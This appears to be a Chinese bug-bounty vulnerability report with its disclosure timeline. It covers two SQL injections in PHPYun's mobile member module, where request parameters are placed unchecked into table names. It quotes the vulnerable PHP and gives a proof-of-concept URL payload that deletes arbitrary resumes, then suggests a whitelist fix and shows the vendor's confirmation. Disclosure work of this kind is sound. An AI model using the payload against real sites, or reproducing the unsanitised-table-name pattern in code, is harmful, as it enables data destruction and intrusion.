2015-04-02: 细节已通知厂商并且等待厂商处理中 2015-04-02: 厂商已经确认,细节仅向厂商公开 2015-04-05: 细节向第三方安全合作伙伴开放 2015-05-27: 细节向核心白帽子及相关领域专家公开 2015-06-06: 细节向普通白帽子公开 2015-06-16: 细节向实习白帽子公开 2015-07-01: 细节向公众公开
phpyun人才系(2015-02-03)Sql注入2枚(可删除任意简历)无法绕过waf,也就获取不了敏感信息。
代码/wap/member/model/index.class.php
function addresume_action()//复制的较长,可直接略过。 { if($this->config['user_enforce_identitycert']=="1") { $row=$this->obj->DB_select_once("resume","`idcard_pic`<>'' and `uid`='".$this->uid."'"); if($row['idcard_status']!="1") { $data['msg']='请先登录电脑客户端完成身份认证!'; $data['url']='index.php'; } } if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->obj->complete($resume_row); $data['msg']='删除成功!'; }else{ $data['msg']='删除失败!'; } $data['url']='index.php?c=addresume&eid='.(int)$_GET['eid']; } if($_POST['submit']){ $_POST=$this->post_trim_iconv($_POST); if($_POST['eid']>0){ $table="resume_".$_POST['table']; $id=(int)$_POST['id']; $url=$_POST['table']; unset($_POST['submit']); unset($_POST['table']); unset($_POST['id']); if($_POST['syear']) { $_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']); $_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']); unset($_POST['syear']); unset($_POST['smouth']); unset($_POST['sday']); unset($_POST['eyear']); unset($_POST['emouth']); unset($_POST['eday']); } if($id) { $where['id']=$id; $where['uid']=$this->uid; $nid=$this->obj->update_once($table,$_POST,$where); }else{ $_POST['uid']=$this->uid; $nid=$this->obj->insert_into($table,$_POST); $this->obj->DB_update_all("user_resume","`$url`=`$url`+1","`eid`='".(int)$_POST['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_POST['eid']."'"); $this->obj->complete($resume_row); } $nid?$data['msg']='保存成功!':$data['msg']='保存失败!'; $data['url']=$nid?('index.php?c=addresume&eid='.(int)$_POST['eid']):''; $data['msg']=iconv('gbk','utf-8',$data['msg']); echo json_encode($data);die; } else{ if($_POST['name']==""){ $data['msg']='姓名不能为空!'; }else if($_POST['sex']==""){ $data['msg']='性别不能为空!'; }else if($this->config['user_idcard']=="1"&&trim($_POST['idcard'])==""){ $data['msg']='身份证号码不能为空!'; }else if($_POST['living']==""){ $data['msg']='现居住地不能为空!'; }else{ unset($_POST['submit']); $this->obj->delfiledir("../upload/tel/".$this->uid); $where['uid']=$this->uid; $nid=$this->obj->update_once("resume",$_POST,$where); if($nid){ $this->obj->update_once("member",array('email'=>$_POST['email'],'moblie'=>$_POST['telphone']),$where); $this->obj->member_log("保存基本信息"); $data['msg']='保存成功!'; $data['url']='index.php?c=addresume'; }else{ $data['msg']='保存失败!'; $data['url']='index.php?c=addresume'; } } } } if(!$_GET['eid']&&$_POST['submit']==''){ $num=$this->obj->DB_select_once("member_statis","`uid`='".$this->uid."'"); $maxnum=$this->config['user_number']-$num['resume_num']; $confignum=$this->config['user_number']; if($maxnum<=0 &&$confignum!=""){ $data['msg']='你的简历数已经超过系统设置的简历数了!'; $data['url']='index.php?c=resume'; } }else if($_GET['eid']){ $row=$this->obj->DB_select_once("resume_expect","`id`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); include(PLUS_PATH."job.cache.php"); $job_classid=@explode(",",$row['job_classid']); foreach($job_classid as $v){ $jobname[]=$job_name[$v]; } $jobname=@implode(",",$jobname); $this->yunset("row",$row); $this->yunset("jobname",$jobname); $skill=$this->obj->DB_select_all("resume_skill","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $work=$this->obj->DB_select_all("resume_work","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $project=$this->obj->DB_select_all("resume_project","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $edu=$this->obj->DB_select_all("resume_edu","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $training=$this->obj->DB_select_all("resume_training","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $cert=$this->obj->DB_select_all("resume_cert","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $other=$this->obj->DB_select_all("resume_other","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $this->yunset("skill",$skill); $this->yunset("work",$work); $this->yunset("project",$project); $this->yunset("edu",$edu); $this->yunset("training",$training); $this->yunset("cert",$cert); $this->yunset("other",$other); } $resume=$this->obj->DB_select_once("resume","`uid`='".$this->uid."'"); $this->yunset("resume",$resume); $this->yunset("layer",$data); $CacheArr['user'] =array('userdata','userclass_name'); $CacheArr['job'] =array('job_index','job_type','job_name'); $CacheArr['city'] =array('city_index','city_type','city_name'); $CacheArr['industry'] =array('industry_index','industry_name'); $CacheArr=$this->CacheInclude($CacheArr); $this->waptpl('addresume'); }
这里我们可以看到 。
$nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");
这里$_GET[‘type’]直接入库。我们可以进行注入。还有这个函数下面的内容
$table="resume_".$_POST['table'];//重点、。。。。。 $id=(int)$_POST['id']; $url=$_POST['table']; unset($_POST['submit']); unset($_POST['table']); unset($_POST['id']); if($_POST['syear']) { $_POST['sdate']=strtotime($_POST['syear']."-".$_POST['smouth']."-".$_POST['sday']); $_POST['edate']=strtotime($_POST['eyear']."-".$_POST['emouth']."-".$_POST['eday']); unset($_POST['syear']); unset($_POST['smouth']); unset($_POST['sday']); unset($_POST['eyear']); unset($_POST['emouth']); unset($_POST['eday']); } if($id) { $where['id']=$id; $where['uid']=$this->uid; $nid=$this->obj->update_once($table,$_POST,$where);
同理的还有下面这个函数
function addresumeson_action() { if($_GET['id']){ $row=$this->obj->DB_select_once("resume_".$_GET['type'],"`id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'");///重点。。。。。 $this->yunset("row",$row); } $this->user_cache(); $this->waptpl('addresumeson'); }
如何删除任意简历。简历在库中信息如下
我们来构造一下type=expect` where id=3#Url
http://localhost/phpyun/wap/member/index.php?c=addresume&id=1&type=expect%60%20where%20id%3D3%23
添加一个 in_array()
危害等级:高
漏洞Rank:15
确认时间:2015-04-02 11:18
感谢您的提供,我们会尽快修复!
暂无